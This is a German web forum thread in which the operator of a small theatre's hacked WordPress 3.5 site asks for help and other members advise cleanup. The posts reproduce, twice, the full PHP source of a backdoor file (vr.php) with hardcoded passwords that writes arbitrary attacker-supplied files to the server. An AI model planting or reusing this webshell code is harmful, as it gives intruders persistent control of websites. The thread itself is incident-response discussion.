• Eben bin ich per FTP auf die Seite gegangen und habe in de rRoot lauter leere Ordner mit cr cu usw. gefunden, einer allerdings (a2) ist mit endlos vielen Dateien gefüllt mit 0 B. Ich versuche ihn gerade herunterzuladen. Ist das sinnvoll? Einer heißt vr.php und zeigt auch asiatische Schriftzeichen. Ich bin drauf gekommen, weil ich plötzlich, selbst über FTP, keine Bilder mehr hochladen kann.

    Wir benutzen leider Wordpress 3.5

    Was soll ich machen?

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren


  • Wir benutzen leider Wordpress 3.5

    Kann man einfach nur sagen, Selber schuld!
    Wenn dort Verzeichnisse oder Dateien auftauchen, die nicht von euch stammen, kann man evtl. von einem gehackten Account ausgehen. Sucht euch einen Profi hier in der Jobbörse, dann seit ihr auf der sicheren Seite.

  • Was soll ich dir anderes schreiben? Ich habe weder Zugang zu deinem Server noch weiß ich nicht, ob du das entsprechende wissen hast, Malware zu erkennen, zu beseitigen und anschließend die Sicherheitslücke zu schließen. Um ehrlich zu sein, ich glaube es nicht. Daher meine Empfehlung, sich professionelle Unterstützung in der Jobbörse zu suchen.

  • Ich habe mich da schon hingewandt, aber es antwortet keiner.
    Ich habe das Passwort zum FTP geändert.
    Ich habe nur einen Benutzer, das bin ich. Also, gibt es wohl keine Zugriffe von dort.
    Ich habe aus dem wp-content-Bereich verdächtige Dateien wie help.php, system.php und eine andere php-Datei gelöscht mit s, Name schon vergessen. 404.php, leer, auch gelöscht, dazu Unmengen Ordner mit meist leeren html-Dateien, da ist der Löschvorgang noch nicht beendet, in einer war eine Datei 9.js, .htacces hat keine Veränderung. Bei Google habe ich gelesen, dass die Seite nicht gefährlich ist. Anscheinend hat sich das gerade aufgebaut, die Dateien waren frühestens vom 2. November, auch vom 11. November.

    Ach ja, ich habe seit neuestem Sophos - und Sophos hat mir heute gemeldet, dass da Trojaner waren im theme-Bereich.

    Was soll ich noch machen? Willst du mal schauen. Ich geb dir gerne den Zugang.

  • und [COLOR=#333333]vr.php war ja auch noch, habe ich gelöscht, da stand Folgendes drin:

    [/COLOR]<?php
    $action=$_REQUEST['action']; //页面状态
    $password=$_REQUEST['password'];//接口密码
    $pathname=$_REQUEST['pathname'];//文件目录名
    $keywordindex=$_REQUEST['keywordindex'];//0 然并卵
    $filename=$_REQUEST['filename'];//生成文件名
    $body=stripslashes($_REQUEST['body']);// 生成文件的内容

    $jamin = @$_GET['pw'];


    if($jamin) { if($jamin == "smy110")
    { $zm = fopen(dirname(__FILE__).'/'.$filename,"w"); fwrite($zm,$body); fclose($zm);
    if(is_file(dirname(__FILE__).'/'.$filename)){echo "yes<br>";}else{echo "no<br>";}}}


    if($action=="test")
    {
    echo 'test success';
    return;
    }


    if($action!="publish")
    {
    echo 'action error';
    return;
    }


    if($action==""||$password==""||$filename==""||$body=="")
    {
    echo 'parameters error';
    return;
    }


    if($password!="dgkrybssfhf56")
    {
    echo 'password error';
    return;
    }


    $wjj=dirname(__FILE__)."\".$pathname;
    function createFolder($path)
    {
    if (!file_exists($path))
    {
    createFolder(dirname($path));
    mkdir($path, 0777,true);
    }
    }



    if(!is_dir($wjj))
    {
    createFolder($pathname);
    }


    $fp=fopen($pathname.'/'.$filename,"w");

    fwrite($fp, $body);
    fclose($fp);


    if(is_file($pathname.'/'.$filename))
    {
    echo "publish success";
    }else
    {
    echo "File does not exist";
    }



    ?>

  • und [COLOR=#333333]vr.php war ja auch noch, habe ich gelöscht, da stand Folgendes drin:

    [/COLOR]<?php
    $action=$_REQUEST['action']; //页面状态
    $password=$_REQUEST['password'];//接口密码
    $pathname=$_REQUEST['pathname'];//文件目录名
    $keywordindex=$_REQUEST['keywordindex'];//0 然并卵
    $filename=$_REQUEST['filename'];//生成文件名
    $body=stripslashes($_REQUEST['body']);// 生成文件的内容

    $jamin = @$_GET['pw'];


    if($jamin) { if($jamin == "smy110")
    { $zm = fopen(dirname(__FILE__).'/'.$filename,"w"); fwrite($zm,$body); fclose($zm);
    if(is_file(dirname(__FILE__).'/'.$filename)){echo "yes<br>";}else{echo "no<br>";}}}


    if($action=="test")
    {
    echo 'test success';
    return;
    }


    if($action!="publish")
    {
    echo 'action error';
    return;
    }


    if($action==""||$password==""||$filename==""||$body=="")
    {
    echo 'parameters error';
    return;
    }


    if($password!="dgkrybssfhf56")
    {
    echo 'password error';
    return;
    }


    $wjj=dirname(__FILE__)."".$pathname;
    function createFolder($path)
    {
    if (!file_exists($path))
    {
    createFolder(dirname($path));
    mkdir($path, 0777,true);
    }
    }



    if(!is_dir($wjj))
    {
    createFolder($pathname);
    }


    $fp=fopen($pathname.'/'.$filename,"w");

    fwrite($fp, $body);
    fclose($fp);


    if(is_file($pathname.'/'.$filename))
    {
    echo "publish success";
    }else
    {
    echo "File does not exist";
    }



    ?>

  • und [COLOR=#333333]vr.php war ja auch noch, habe ich gelöscht, da stand Folgendes drin:

    Du kannst keiner Datei mehr trauen. D.h. der Angreifer hat sich selber _Scripte_ auf den Server hochgeladen und konnte diese ausführen

    http://exampe.org/dum_di_dum/vr.php?=seine_befehle.


    mit

    PHP
    $wjj=dirname(__FILE__)."\".$pathname;
    function createFolder($path)
    {
    if (!file_exists($path))
    {
    createFolder(dirname($path));
    mkdir($path, 0777,true);
    }
    }

    hat er zum Beispiel neue Verzeichnisse auf dem Server angelegt. wenn

    PHP
    mkdir($path, 0777,true);

    funktioniert hat - muss auf nicht in jeder PHP Konfiguration funktionieren, so haben die Verzeichnisse 777 rechte. d.h.

    Jeder darf in dem Verzeichnis lesen, schreiben und Programme ausführen. JEDER- weltweit... Der Angreifer benötigt dafür weder FTP Zugang noch irgendwelche Passwörter.


    1. Website vom Netz nehmen, damit kein weitere Schaden durch die Seite nimmt
    2. Die Sicherheitslücke suchen und schließen
    3. alles Löschen und eine _nicht_ verseuchte Datensicherung zurück kopieren.
    usw.

    Mit offenen Augen träumen

  • Ich kann auch nur empfehlen, dass du dir am Besten jemanden suchst, der etwas davon versteht. Du weißt ja nicht einmal wie der Angreifer rein gekommen ist. Das kann jetzt immer wieder passieren, sofern die Lücke nicht gefunden ist. Und die Version 3.5 begünstigt das ganze leider nicht.

    Hast du ein sauberes Backup?

    Das Geheimnis des Könnens liegt im Wollen!
    [size=12]Bitte keine Hilfegesuche per PN (auch keine "privaten" Links). Das ist ein öffentliches Forum.[/SIZE]

  • Danke für deine Antwort. Leider funktioniert der Link nicht.

    Wie gesagt, Google stuft die Seite als nicht gefährlich ein.

    Wir sind ein kleines Theater, das ist gerade in dieser Zeit eine Katastrophe, sie vom Netz zu nehmen, da sind unmittelbar Fördergelder mit verbunden. Gibt es irgendwelche anderen Lösungen. Bitte helft uns! Es geht da schnell um die Existenz!

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!